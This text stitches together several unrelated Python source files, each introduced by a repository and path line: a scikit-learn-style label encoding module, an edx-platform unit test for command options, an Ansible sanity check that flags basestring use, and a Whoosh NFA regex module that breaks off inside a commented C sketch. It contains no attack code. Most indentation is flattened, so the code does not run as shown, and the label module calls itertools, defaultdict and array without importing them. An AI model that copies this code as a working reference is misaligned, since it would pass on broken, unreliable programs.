import numpy as np
import scipy.sparse as sp
from ..base import BaseEstimator, TransformerMixin
from ..utils.fixes import np_version
from ..utils.fixes import sparse_min_max
from ..utils.fixes import astype
from ..utils.fixes import in1d
from ..utils import column_or_1d
from ..utils.validation import check_array
from ..utils.validation import check_is_fitted
from ..utils.validation import _num_samples
from ..utils.multiclass import unique_labels
from ..utils.multiclass import type_of_target
from ..externals import six
zip = six.moves.zip
map = six.moves.map
__all__ = [
'label_binarize',
'LabelBinarizer',
'LabelEncoder',
'MultiLabelBinarizer',
]
def _check_numpy_unicode_bug(labels):
"""Check that user is not subject to an old numpy bug
Fixed in master before 1.7.0:
https://github.com/numpy/numpy/pull/243
"""
if np_version[:3] < (1, 7, 0) and labels.dtype.kind == 'U':
raise RuntimeError("NumPy < 1.7.0 does not implement searchsorted"
" on unicode data correctly. Please upgrade"
" NumPy to use LabelEncoder with unicode inputs.")
class LabelEncoder(BaseEstimator, TransformerMixin):
"""Encode labels with value between 0 and n_classes-1.
Read more in the :ref:`User Guide <preprocessing_targets>`.
Attributes
----------
classes_ : array of shape (n_class,)
Holds the label for each class.
Examples
--------
`LabelEncoder` can be used to normalize labels.
>>> from sklearn import preprocessing
>>> le = preprocessing.LabelEncoder()
>>> le.fit([1, 2, 2, 6])
LabelEncoder()
>>> le.classes_
array([1, 2, 6])
>>> le.transform([1, 1, 2, 6]) #doctest: +ELLIPSIS
array([0, 0, 1, 2]...)
>>> le.inverse_transform([0, 0, 1, 2])
array([1, 1, 2, 6])
It can also be used to transform non-numerical labels (as long as they are
hashable and comparable) to numerical labels.
>>> le = preprocessing.LabelEncoder()
>>> le.fit(["paris", "paris", "tokyo", "amsterdam"])
LabelEncoder()
>>> list(le.classes_)
['amsterdam', 'paris', 'tokyo']
>>> le.transform(["tokyo", "tokyo", "paris"]) #doctest: +ELLIPSIS
array([2, 2, 1]...)
>>> list(le.inverse_transform([2, 2, 1]))
['tokyo', 'tokyo', 'paris']
"""
def fit(self, y):
"""Fit label encoder
Parameters
----------
y : array-like of shape (n_samples,)
Target values.
Returns
-------
self : returns an instance of self.
"""
y = column_or_1d(y, warn=True)
_check_numpy_unicode_bug(y)
self.classes_ = np.unique(y)
return self
def fit_transform(self, y):
"""Fit label encoder and return encoded labels
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
y : array-like of shape [n_samples]
"""
y = column_or_1d(y, warn=True)
_check_numpy_unicode_bug(y)
self.classes_, y = np.unique(y, return_inverse=True)
return y
def transform(self, y):
"""Transform labels to normalized encoding.
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
y : array-like of shape [n_samples]
"""
check_is_fitted(self, 'classes_')
classes = np.unique(y)
_check_numpy_unicode_bug(classes)
if len(np.intersect1d(classes, self.classes_)) < len(classes):
diff = np.setdiff1d(classes, self.classes_)
raise ValueError("y contains new labels: %s" % str(diff))
return np.searchsorted(self.classes_, y)
def inverse_transform(self, y):
"""Transform labels back to original encoding.
Parameters
----------
y : numpy array of shape [n_samples]
Target values.
Returns
-------
y : numpy array of shape [n_samples]
"""
check_is_fitted(self, 'classes_')
diff = np.setdiff1d(y, np.arange(len(self.classes_)))
        if len(diff):
raise ValueError("y contains new labels: %s" % str(diff))
y = np.asarray(y)
return self.classes_[y]
class LabelBinarizer(BaseEstimator, TransformerMixin):
"""Binarize labels in a one-vs-all fashion
Several regression and binary classification algorithms are
available in the scikit. A simple way to extend these algorithms
to the multi-class classification case is to use the so-called
one-vs-all scheme.
At learning time, this simply consists in learning one regressor
or binary classifier per class. In doing so, one needs to convert
multi-class labels to binary labels (belong or does not belong
to the class). LabelBinarizer makes this process easy with the
transform method.
At prediction time, one assigns the class for which the corresponding
model gave the greatest confidence. LabelBinarizer makes this easy
with the inverse_transform method.
Read more in the :ref:`User Guide <preprocessing_targets>`.
Parameters
----------
neg_label : int (default: 0)
Value with which negative labels must be encoded.
pos_label : int (default: 1)
Value with which positive labels must be encoded.
sparse_output : boolean (default: False)
True if the returned array from transform is desired to be in sparse
CSR format.
Attributes
----------
classes_ : array of shape [n_class]
Holds the label for each class.
y_type_ : str,
Represents the type of the target data as evaluated by
        utils.multiclass.type_of_target. Possible types are 'continuous',
        'continuous-multioutput', 'binary', 'multiclass',
        'multiclass-multioutput', 'multilabel-indicator', and 'unknown'.
multilabel_ : boolean
True if the transformer was fitted on a multilabel rather than a
multiclass set of labels. The ``multilabel_`` attribute is deprecated
and will be removed in 0.18
sparse_input_ : boolean,
True if the input data to transform is given as a sparse matrix, False
otherwise.
indicator_matrix_ : str
        'sparse' when the input data to transform is a multilabel-indicator and
is sparse, None otherwise. The ``indicator_matrix_`` attribute is
deprecated as of version 0.16 and will be removed in 0.18
Examples
--------
>>> from sklearn import preprocessing
>>> lb = preprocessing.LabelBinarizer()
>>> lb.fit([1, 2, 6, 4, 2])
LabelBinarizer(neg_label=0, pos_label=1, sparse_output=False)
>>> lb.classes_
array([1, 2, 4, 6])
>>> lb.transform([1, 6])
array([[1, 0, 0, 0],
[0, 0, 0, 1]])
Binary targets transform to a column vector
>>> lb = preprocessing.LabelBinarizer()
>>> lb.fit_transform(['yes', 'no', 'no', 'yes'])
array([[1],
[0],
[0],
[1]])
Passing a 2D matrix for multilabel classification
>>> import numpy as np
>>> lb.fit(np.array([[0, 1, 1], [1, 0, 0]]))
LabelBinarizer(neg_label=0, pos_label=1, sparse_output=False)
>>> lb.classes_
array([0, 1, 2])
>>> lb.transform([0, 1, 2, 1])
array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[0, 1, 0]])
See also
--------
label_binarize : function to perform the transform operation of
LabelBinarizer with fixed classes.
"""
def __init__(self, neg_label=0, pos_label=1, sparse_output=False):
if neg_label >= pos_label:
raise ValueError("neg_label={0} must be strictly less than "
"pos_label={1}.".format(neg_label, pos_label))
if sparse_output and (pos_label == 0 or neg_label != 0):
raise ValueError("Sparse binarization is only supported with non "
"zero pos_label and zero neg_label, got "
"pos_label={0} and neg_label={1}"
"".format(pos_label, neg_label))
self.neg_label = neg_label
self.pos_label = pos_label
self.sparse_output = sparse_output
def fit(self, y):
"""Fit label binarizer
Parameters
----------
y : numpy array of shape (n_samples,) or (n_samples, n_classes)
Target values. The 2-d matrix should only contain 0 and 1,
            which represents multilabel classification.
Returns
-------
self : returns an instance of self.
"""
self.y_type_ = type_of_target(y)
if 'multioutput' in self.y_type_:
raise ValueError("Multioutput target data is not supported with "
"label binarization")
if _num_samples(y) == 0:
raise ValueError('y has 0 samples: %r' % y)
self.sparse_input_ = sp.issparse(y)
self.classes_ = unique_labels(y)
return self
def transform(self, y):
"""Transform multi-class labels to binary labels
The output of transform is sometimes referred to by some authors as the
1-of-K coding scheme.
Parameters
----------
y : numpy array or sparse matrix of shape (n_samples,) or
(n_samples, n_classes) Target values. The 2-d matrix should only
            contain 0 and 1, which represents multilabel classification. Sparse
matrix can be CSR, CSC, COO, DOK, or LIL.
Returns
-------
Y : numpy array or CSR matrix of shape [n_samples, n_classes]
Shape will be [n_samples, 1] for binary problems.
"""
check_is_fitted(self, 'classes_')
y_is_multilabel = type_of_target(y).startswith('multilabel')
if y_is_multilabel and not self.y_type_.startswith('multilabel'):
raise ValueError("The object was not fitted with multilabel"
" input.")
return label_binarize(y, self.classes_,
pos_label=self.pos_label,
neg_label=self.neg_label,
sparse_output=self.sparse_output)
def inverse_transform(self, Y, threshold=None):
"""Transform binary labels back to multi-class labels
Parameters
----------
Y : numpy array or sparse matrix with shape [n_samples, n_classes]
Target values. All sparse matrices are converted to CSR before
inverse transformation.
threshold : float or None
Threshold used in the binary and multi-label cases.
Use 0 when:
- Y contains the output of decision_function (classifier)
Use 0.5 when:
- Y contains the output of predict_proba
If None, the threshold is assumed to be half way between
neg_label and pos_label.
Returns
-------
        y : numpy array or CSR matrix of shape [n_samples]
            Target values.
Notes
-----
In the case when the binary labels are fractional
(probabilistic), inverse_transform chooses the class with the
greatest value. Typically, this allows to use the output of a
linear model's decision_function method directly as the input
of inverse_transform.
"""
check_is_fitted(self, 'classes_')
if threshold is None:
threshold = (self.pos_label + self.neg_label) / 2.
if self.y_type_ == "multiclass":
y_inv = _inverse_binarize_multiclass(Y, self.classes_)
else:
y_inv = _inverse_binarize_thresholding(Y, self.y_type_,
self.classes_, threshold)
if self.sparse_input_:
y_inv = sp.csr_matrix(y_inv)
elif sp.issparse(y_inv):
y_inv = y_inv.toarray()
return y_inv
def label_binarize(y, classes, neg_label=0, pos_label=1, sparse_output=False):
"""Binarize labels in a one-vs-all fashion
Several regression and binary classification algorithms are
available in the scikit. A simple way to extend these algorithms
to the multi-class classification case is to use the so-called
one-vs-all scheme.
This function makes it possible to compute this transformation for a
fixed set of class labels known ahead of time.
Parameters
----------
y : array-like
Sequence of integer labels or multilabel data to encode.
classes : array-like of shape [n_classes]
Uniquely holds the label for each class.
neg_label : int (default: 0)
Value with which negative labels must be encoded.
pos_label : int (default: 1)
Value with which positive labels must be encoded.
sparse_output : boolean (default: False),
Set to true if output binary array is desired in CSR sparse format
Returns
-------
Y : numpy array or CSR matrix of shape [n_samples, n_classes]
Shape will be [n_samples, 1] for binary problems.
Examples
--------
>>> from sklearn.preprocessing import label_binarize
>>> label_binarize([1, 6], classes=[1, 2, 4, 6])
array([[1, 0, 0, 0],
[0, 0, 0, 1]])
The class ordering is preserved:
>>> label_binarize([1, 6], classes=[1, 6, 4, 2])
array([[1, 0, 0, 0],
[0, 1, 0, 0]])
Binary targets transform to a column vector
>>> label_binarize(['yes', 'no', 'no', 'yes'], classes=['no', 'yes'])
array([[1],
[0],
[0],
[1]])
See also
--------
LabelBinarizer : class used to wrap the functionality of label_binarize and
allow for fitting to classes independently of the transform operation
"""
if not isinstance(y, list):
# XXX Workaround that will be removed when list of list format is
# dropped
y = check_array(y, accept_sparse='csr', ensure_2d=False, dtype=None)
else:
if _num_samples(y) == 0:
raise ValueError('y has 0 samples: %r' % y)
if neg_label >= pos_label:
raise ValueError("neg_label={0} must be strictly less than "
"pos_label={1}.".format(neg_label, pos_label))
if (sparse_output and (pos_label == 0 or neg_label != 0)):
raise ValueError("Sparse binarization is only supported with non "
"zero pos_label and zero neg_label, got "
"pos_label={0} and neg_label={1}"
"".format(pos_label, neg_label))
# To account for pos_label == 0 in the dense case
pos_switch = pos_label == 0
if pos_switch:
pos_label = -neg_label
y_type = type_of_target(y)
if 'multioutput' in y_type:
raise ValueError("Multioutput target data is not supported with label "
"binarization")
if y_type == 'unknown':
raise ValueError("The type of target data is not known")
n_samples = y.shape[0] if sp.issparse(y) else len(y)
n_classes = len(classes)
classes = np.asarray(classes)
if y_type == "binary":
if len(classes) == 1:
Y = np.zeros((len(y), 1), dtype=np.int)
Y += neg_label
return Y
elif len(classes) >= 3:
y_type = "multiclass"
sorted_class = np.sort(classes)
if (y_type == "multilabel-indicator" and classes.size != y.shape[1]):
raise ValueError("classes {0} missmatch with the labels {1}"
"found in the data".format(classes, unique_labels(y)))
if y_type in ("binary", "multiclass"):
y = column_or_1d(y)
# pick out the known labels from y
y_in_classes = in1d(y, classes)
y_seen = y[y_in_classes]
indices = np.searchsorted(sorted_class, y_seen)
indptr = np.hstack((0, np.cumsum(y_in_classes)))
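        # each row has at most one nonzero (present only when its label is known),
        # so the cumulative sum of the membership mask is exactly the CSR row pointer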
data = np.empty_like(indices)
data.fill(pos_label)
Y = sp.csr_matrix((data, indices, indptr),
shape=(n_samples, n_classes))
elif y_type == "multilabel-indicator":
Y = sp.csr_matrix(y)
if pos_label != 1:
data = np.empty_like(Y.data)
data.fill(pos_label)
Y.data = data
else:
raise ValueError("%s target data is not supported with label "
"binarization" % y_type)
if not sparse_output:
Y = Y.toarray()
Y = astype(Y, int, copy=False)
if neg_label != 0:
Y[Y == 0] = neg_label
if pos_switch:
Y[Y == pos_label] = 0
else:
Y.data = astype(Y.data, int, copy=False)
# preserve label ordering
if np.any(classes != sorted_class):
indices = np.searchsorted(sorted_class, classes)
Y = Y[:, indices]
if y_type == "binary":
if sparse_output:
Y = Y.getcol(-1)
else:
Y = Y[:, -1].reshape((-1, 1))
return Y
def _inverse_binarize_multiclass(y, classes):
"""Inverse label binarization transformation for multiclass.
Multiclass uses the maximal score instead of a threshold.
"""
classes = np.asarray(classes)
if sp.issparse(y):
# Find the argmax for each row in y where y is a CSR matrix
y = y.tocsr()
n_samples, n_outputs = y.shape
outputs = np.arange(n_outputs)
row_max = sparse_min_max(y, 1)[1]
row_nnz = np.diff(y.indptr)
y_data_repeated_max = np.repeat(row_max, row_nnz)
# picks out all indices obtaining the maximum per row
y_i_all_argmax = np.flatnonzero(y_data_repeated_max == y.data)
# For corner case where last row has a max of 0
if row_max[-1] == 0:
y_i_all_argmax = np.append(y_i_all_argmax, [len(y.data)])
# Gets the index of the first argmax in each row from y_i_all_argmax
index_first_argmax = np.searchsorted(y_i_all_argmax, y.indptr[:-1])
# first argmax of each row
y_ind_ext = np.append(y.indices, [0])
y_i_argmax = y_ind_ext[y_i_all_argmax[index_first_argmax]]
# Handle rows of all 0
y_i_argmax[np.where(row_nnz == 0)[0]] = 0
# Handles rows with max of 0 that contain negative numbers
samples = np.arange(n_samples)[(row_nnz > 0) &
(row_max.ravel() == 0)]
for i in samples:
ind = y.indices[y.indptr[i]:y.indptr[i + 1]]
y_i_argmax[i] = classes[np.setdiff1d(outputs, ind)][0]
return classes[y_i_argmax]
else:
return classes.take(y.argmax(axis=1), mode="clip")
def _inverse_binarize_thresholding(y, output_type, classes, threshold):
"""Inverse label binarization transformation using thresholding."""
if output_type == "binary" and y.ndim == 2 and y.shape[1] > 2:
raise ValueError("output_type='binary', but y.shape = {0}".
format(y.shape))
if output_type != "binary" and y.shape[1] != len(classes):
raise ValueError("The number of class is not equal to the number of "
"dimension of y.")
classes = np.asarray(classes)
# Perform thresholding
if sp.issparse(y):
if threshold > 0:
if y.format not in ('csr', 'csc'):
y = y.tocsr()
y.data = np.array(y.data > threshold, dtype=np.int)
y.eliminate_zeros()
else:
y = np.array(y.toarray() > threshold, dtype=np.int)
else:
y = np.array(y > threshold, dtype=np.int)
# Inverse transform data
if output_type == "binary":
if sp.issparse(y):
y = y.toarray()
if y.ndim == 2 and y.shape[1] == 2:
return classes[y[:, 1]]
else:
if len(classes) == 1:
y = np.empty(len(y), dtype=classes.dtype)
y.fill(classes[0])
return y
else:
return classes[y.ravel()]
elif output_type == "multilabel-indicator":
return y
else:
raise ValueError("{0} format is not supported".format(output_type))
class MultiLabelBinarizer(BaseEstimator, TransformerMixin):
"""Transform between iterable of iterables and a multilabel format
Although a list of sets or tuples is a very intuitive format for multilabel
data, it is unwieldy to process. This transformer converts between this
intuitive format and the supported multilabel format: a (samples x classes)
binary matrix indicating the presence of a class label.
Parameters
----------
classes : array-like of shape [n_classes] (optional)
Indicates an ordering for the class labels
sparse_output : boolean (default: False),
Set to true if output binary array is desired in CSR sparse format
Attributes
----------
classes_ : array of labels
A copy of the `classes` parameter where provided,
or otherwise, the sorted set of classes found when fitting.
Examples
--------
>>> mlb = MultiLabelBinarizer()
>>> mlb.fit_transform([(1, 2), (3,)])
array([[1, 1, 0],
[0, 0, 1]])
>>> mlb.classes_
array([1, 2, 3])
>>> mlb.fit_transform([set(['sci-fi', 'thriller']), set(['comedy'])])
array([[0, 1, 1],
[1, 0, 0]])
>>> list(mlb.classes_)
['comedy', 'sci-fi', 'thriller']
"""
def __init__(self, classes=None, sparse_output=False):
self.classes = classes
self.sparse_output = sparse_output
def fit(self, y):
"""Fit the label sets binarizer, storing `classes_`
Parameters
----------
y : iterable of iterables
A set of labels (any orderable and hashable object) for each
sample. If the `classes` parameter is set, `y` will not be
iterated.
Returns
-------
self : returns this MultiLabelBinarizer instance
"""
if self.classes is None:
classes = sorted(set(itertools.chain.from_iterable(y)))
else:
classes = self.classes
dtype = np.int if all(isinstance(c, int) for c in classes) else object
self.classes_ = np.empty(len(classes), dtype=dtype)
self.classes_[:] = classes
return self
def fit_transform(self, y):
"""Fit the label sets binarizer and transform the given label sets
Parameters
----------
y : iterable of iterables
A set of labels (any orderable and hashable object) for each
sample. If the `classes` parameter is set, `y` will not be
iterated.
Returns
-------
y_indicator : array or CSR matrix, shape (n_samples, n_classes)
A matrix such that `y_indicator[i, j] = 1` iff `classes_[j]` is in
`y[i]`, and 0 otherwise.
"""
if self.classes is not None:
return self.fit(y).transform(y)
# Automatically increment on new class
class_mapping = defaultdict(int)
class_mapping.default_factory = class_mapping.__len__
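        # default_factory returns the current size of the mapping, so every label
        # seen for the first time gets the next free column index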
yt = self._transform(y, class_mapping)
# sort classes and reorder columns
tmp = sorted(class_mapping, key=class_mapping.get)
# (make safe for tuples)
dtype = np.int if all(isinstance(c, int) for c in tmp) else object
class_mapping = np.empty(len(tmp), dtype=dtype)
class_mapping[:] = tmp
self.classes_, inverse = np.unique(class_mapping, return_inverse=True)
yt.indices = np.take(inverse, yt.indices)
if not self.sparse_output:
yt = yt.toarray()
return yt
def transform(self, y):
"""Transform the given label sets
Parameters
----------
y : iterable of iterables
A set of labels (any orderable and hashable object) for each
sample. If the `classes` parameter is set, `y` will not be
iterated.
Returns
-------
y_indicator : array or CSR matrix, shape (n_samples, n_classes)
A matrix such that `y_indicator[i, j] = 1` iff `classes_[j]` is in
`y[i]`, and 0 otherwise.
"""
class_to_index = dict(zip(self.classes_, range(len(self.classes_))))
yt = self._transform(y, class_to_index)
if not self.sparse_output:
yt = yt.toarray()
return yt
def _transform(self, y, class_mapping):
"""Transforms the label sets with a given mapping
Parameters
----------
y : iterable of iterables
class_mapping : Mapping
Maps from label to column index in label indicator matrix
Returns
-------
y_indicator : sparse CSR matrix, shape (n_samples, n_classes)
Label indicator matrix
"""
indices = array.array('i')
indptr = array.array('i', [0])
for labels in y:
indices.extend(set(class_mapping[label] for label in labels))
indptr.append(len(indices))
data = np.ones(len(indices), dtype=int)
return sp.csr_matrix((data, indices, indptr),
shape=(len(indptr) - 1, len(class_mapping)))
def inverse_transform(self, yt):
"""Transform the given indicator matrix into label sets
Parameters
----------
yt : array or sparse matrix of shape (n_samples, n_classes)
            A matrix containing only 1s and 0s.
Returns
-------
y : list of tuples
The set of labels for each sample such that `y[i]` consists of
`classes_[j]` for each `yt[i, j] == 1`.
"""
if yt.shape[1] != len(self.classes_):
raise ValueError('Expected indicator for {0} classes, but got {1}'
.format(len(self.classes_), yt.shape[1]))
if sp.issparse(yt):
yt = yt.tocsr()
if len(yt.data) != 0 and len(np.setdiff1d(yt.data, [0, 1])) > 0:
raise ValueError('Expected only 0s and 1s in label indicator.')
return [tuple(self.classes_.take(yt.indices[start:end]))
for start, end in zip(yt.indptr[:-1], yt.indptr[1:])]
else:
unexpected = np.setdiff1d(yt, [0, 1])
if len(unexpected) > 0:
raise ValueError('Expected only 0s and 1s in label indicator. '
'Also got {0}'.format(unexpected))
return [tuple(self.classes_.compress(indicators)) for indicators
in yt]
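# Illustrative sketch added for this listing (not part of scikit-learn): a full
# fit/transform/inverse round trip with MultiLabelBinarizer, using made-up label
# sets.
def _example_multilabel_round_trip():
    mlb = MultiLabelBinarizer()
    indicator = mlb.fit_transform([(1, 2), (3,)])   # [[1, 1, 0], [0, 0, 1]]
    return mlb.inverse_transform(indicator)         # [(1, 2), (3,)]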
|
eduNEXT/edx-platform | refs/heads/master | openedx/core/lib/tests/test_command_utils.py | 5 | """
Tests of management command utility code
"""
from unittest import TestCase
import ddt
import pytest
from django.core.management import CommandError
from .. import command_utils
@ddt.ddt
class MutuallyExclusiveRequiredOptionsTestCase(TestCase):
"""
Test that mutually exclusive required options allow one and only one option
to be specified with a true value.
"""
@ddt.data(
(['opta'], {'opta': 1}, 'opta'),
(['opta', 'optb'], {'opta': 1}, 'opta'),
(['opta', 'optb'], {'optb': 1}, 'optb'),
(['opta', 'optb'], {'opta': 1, 'optc': 1}, 'opta'),
(['opta', 'optb'], {'opta': 1, 'optb': 0}, 'opta'),
(['opta', 'optb', 'optc'], {'optc': 1, 'optd': 1}, 'optc'),
(['opta', 'optb', 'optc'], {'optc': 1}, 'optc'),
(['opta', 'optb', 'optc'], {'optd': 0, 'optc': 1}, 'optc'),
)
@ddt.unpack
def test_successful_exclusive_options(self, exclusions, opts, expected):
result = command_utils.get_mutually_exclusive_required_option(opts, *exclusions)
assert result == expected
@ddt.data(
(['opta'], {'opta': 0}),
(['opta', 'optb'], {'opta': 1, 'optb': 1}),
(['opta', 'optb'], {'optc': 1, 'optd': 1}),
(['opta', 'optb'], {}),
(['opta', 'optb', 'optc'], {'opta': 1, 'optc': 1}),
(['opta', 'optb', 'optc'], {'opta': 1, 'optb': 1}),
(['opta', 'optb', 'optc'], {'optb': 1, 'optc': 1}),
(['opta', 'optb', 'optc'], {'opta': 1, 'optb': 1, 'optc': 1}),
(['opta', 'optb', 'optc'], {}),
)
@ddt.unpack
def test_invalid_exclusive_options(self, exclusions, opts):
with pytest.raises(CommandError):
command_utils.get_mutually_exclusive_required_option(opts, *exclusions)
|
anryko/ansible | refs/heads/devel | test/lib/ansible_test/_data/sanity/code-smell/no-basestring.py | 68 | #!/usr/bin/env python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import sys
def main():
for path in sys.argv[1:] or sys.stdin.read().splitlines():
with open(path, 'r') as path_fd:
for line, text in enumerate(path_fd.readlines()):
match = re.search(r'(isinstance.*basestring)', text)
if match:
print('%s:%d:%d: do not use `isinstance(s, basestring)`' % (
path, line + 1, match.start(1) + 1))
if __name__ == '__main__':
main()
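# Illustrative note (not part of the original check): for an input line such as
# `if isinstance(value, basestring):` the script prints a message of the form
# "<path>:<line>:<column>: do not use `isinstance(s, basestring)`", where the
# column points at the start of the isinstance(...) expression (1-based).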
|
betoesquivel/fil2014 | refs/heads/master | filenv/lib/python2.7/site-packages/whoosh/automata/nfa.py | 95 | # Copyright 2012 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from whoosh.automata.fst import Arc
class Instruction(object):
def __repr__(self):
return "%s()" % (self.__class__.__name__, )
class Char(Instruction):
"""
Matches a literal character.
"""
def __init__(self, c):
self.c = c
def __repr__(self):
return "Char(%r)" % self.c
class Lit(Instruction):
"""
Matches a literal string.
"""
def __init__(self, c):
self.c = c
def __repr__(self):
return "Lit(%r)" % self.c
class Any(Instruction):
"""
Matches any character.
"""
class Match(Instruction):
"""
Stop this thread: the string matched.
"""
def __repr__(self):
return "Match()"
class Jmp(Instruction):
"""
Jump to a specified instruction.
"""
def __init__(self, x):
self.x = x
def __repr__(self):
return "Jmp(%s)" % self.x
class Split(Instruction):
"""
Split execution: continue at two separate specified instructions.
"""
def __init__(self, x, y):
self.x = x
self.y = y
def __repr__(self):
return "Split(%s, %s)" % (self.x, self.y)
class Label(Instruction):
"""
Placeholder to act as a target for JMP instructions
"""
def __hash__(self):
return id(self)
def __repr__(self):
return "L(%s)" % hex(id(self))
def concat(e1, e2):
return e1 + e2
def alt(e1, e2):
L1, L2, L3 = Label(), Label(), Label()
return [L1] + e1 + [Jmp(L3), L2] + e2 + [L3]
def zero_or_one(e):
L1, L2 = Label(), Label()
return [Split(L1, L2), L1] + e + [L2]
def zero_or_more(e):
L1, L2, L3 = Label(), Label(), Label()
return [L1, Split(L2, L3), L2] + e + [Jmp(L1), L3]
def one_or_more(e):
L1, L2 = Label(), Label()
return [L1] + e + [Split(L1, L2), L2]
def fixup(program):
refs = {}
i = 0
while i < len(program):
op = program[i]
if isinstance(op, Label):
refs[op] = i
program.pop(i)
else:
i += 1
if refs:
for op in program:
if isinstance(op, (Jmp, Split)):
op.x = refs[op.x]
if isinstance(op, Split):
op.y = refs[op.y]
return program + [Match]
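# Illustrative sketch added for this listing (not part of Whoosh): compiling the
# regex "ab*" by hand.  fixup() strips the Label placeholders, rewrites Jmp/Split
# targets to absolute instruction indices and appends the terminating Match.
def _example_compile_ab_star():
    return fixup(concat([Char("a")], zero_or_more([Char("b")])))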
class ThreadList(object):
def __init__(self, program, max=1000):
self.program = program
self.max = max
self.threads = []
def __nonzero__(self):
return bool(self.threads)
def current(self):
return self.threads.pop()
def add(self, thread):
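        # Jmp and Split are followed eagerly here, so only threads positioned at
        # Char/Lit/Any/Match instructions end up in the queue (effectively the
        # epsilon closure of the NFA state).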
op = self.program[thread.pc]
optype = type(op)
if optype is Jmp:
self.add(thread.at(op.x))
elif optype is Split:
self.add(thread.copy_at(op.x))
self.add(thread.at(op.y))
else:
self.threads.append(thread)
class Thread(object):
def __init__(self, pc, address, sofar='', accept=False):
self.pc = pc
self.address = address
self.sofar = sofar
self.accept = accept
def at(self, pc):
self.pc = pc
return self
def copy_at(self, pc):
return Thread(pc, self.address, self.sofar, self.accept)
def __repr__(self):
d = self.__dict__
return "Thread(%s)" % ",".join("%s=%r" % (k, v) for k, v in d.items())
def advance(thread, arc, c):
thread.pc += 1
thread.address = arc.target
thread.sofar += c
thread.accept = arc.accept
def run(graph, program, address):
threads = ThreadList(program)
threads.add(Thread(0, address))
arc = Arc()
while threads:
thread = threads.current()
address = thread.address
op = program[thread.pc]
optype = type(op)
if optype is Char:
if address:
arc = graph.find_arc(address, op.c, arc)
if arc:
                    advance(thread, arc, op.c)
threads.add(thread)
elif optype is Lit:
if address:
c = op.c
arc = graph.find_path(c, arc, address)
if arc:
advance(thread, arc, c)
threads.add(thread)
elif optype is Any:
if address:
sofar = thread.sofar
pc = thread.pc + 1
for arc in graph.iter_arcs(address, arc):
t = Thread(pc, arc.target, sofar + arc.label, arc.accept)
threads.add(t)
elif op is Match:
if thread.accept:
yield thread.sofar
else:
raise Exception("Don't know what to do with %r" % op)
LO = 0
HI = 1
def regex_limit(graph, mode, program, address):
low = mode == LO
output = []
threads = ThreadList(program)
threads.add(Thread(0, address))
arc = Arc()
while threads:
thread = threads.current()
address = thread.address
op = program[thread.pc]
optype = type(op)
if optype is Char:
if address:
arc = graph.find_arc(address, op.c, arc)
if arc:
                    if low and arc.accept:
                        return thread.sofar + op.c
                    advance(thread, arc, op.c)
threads.add(thread)
elif optype is Lit:
if address:
labels = op.c
for label in labels:
arc = graph.find_arc(address, label)
if arc is None:
return thread.sofar
elif thread.accept:
return thread.sofar
elif optype is Any:
if address:
if low:
arc = graph.arc_at(address, arc)
else:
for arc in graph.iter_arcs(address):
pass
advance(thread, arc, arc.label)
threads.add(thread)
elif thread.accept:
return thread.sofar
elif op is Match:
return thread.sofar
else:
raise Exception("Don't know what to do with %r" % op)
# if __name__ == "__main__":
# from whoosh import index, query
# from whoosh.filedb.filestore import RamStorage
# from whoosh.automata import fst
# from whoosh.util.testing import timing
#
# st = RamStorage()
# gw = fst.GraphWriter(st.create_file("test"))
# gw.start_field("test")
# for key in ["aaaa", "aaab", "aabb", "abbb", "babb", "bbab", "bbba"]:
# gw.insert(key)
# gw.close()
# gr = fst.GraphReader(st.open_file("test"))
#
# program = one_or_more([Lit("a")])
# print program
# program = fixup(program)
# print program
# print list(run(gr, program, gr.root("test")))
#
# ix = index.open_dir("e:/dev/src/houdini/help/index")
# r = ix.reader()
# gr = r._get_graph()
#
# # program = fixup([Any(), Any(), Any(), Any(), Any()])
# # program = fixup(concat(zero_or_more([Any()]), [Char("/")]))
# # with timing():
# # x = list(run(gr, program, gr.root("path")))
# # print len(x)
#
# q = query.Regex("path", "^.[abc].*/$")
# with timing():
# y = list(q._btexts(r))
# print len(y)
# print y[0], y[-1]
#
# pr = [Any()] + alt([Lit("c")], alt([Lit("b")], [Lit("a")])) + zero_or_more([Any()]) + [Lit("/")]
# program = fixup(pr)
# # with timing():
# # x = list(run(gr, program, gr.root("path")))
# # print len(x), x
#
# with timing():
# print "lo=", regex_limit(gr, LO, program, gr.root("path"))
# print "hi=", regex_limit(gr, HI, program, gr.root("path"))
#
#
#
# #int
# #backtrackingvm(Inst *prog, char *input)
# #{
# # enum { MAXTHREAD = 1000 };
# # Thread ready[MAXTHREAD];
# # int nready;
# # Inst *pc;
# # char *sp;
# #
# # /* queue initial thread */
# # ready[0] = thread(prog, input);
# # nready = 1;
# #
# # /* run threads in stack order */
# # while(nready > 0){
# # --nready; /* pop state for next thread to run */
# # pc = ready[nready].pc;
# # sp = ready[nready].sp;
# # for(;;){
# # switch(pc->opcode){
# # case Char:
# # if(*sp != pc->c)
# # goto Dead;
# # pc++;
# # sp++;
# # continue;
# # case Match:
# # return 1;
# # case Jmp:
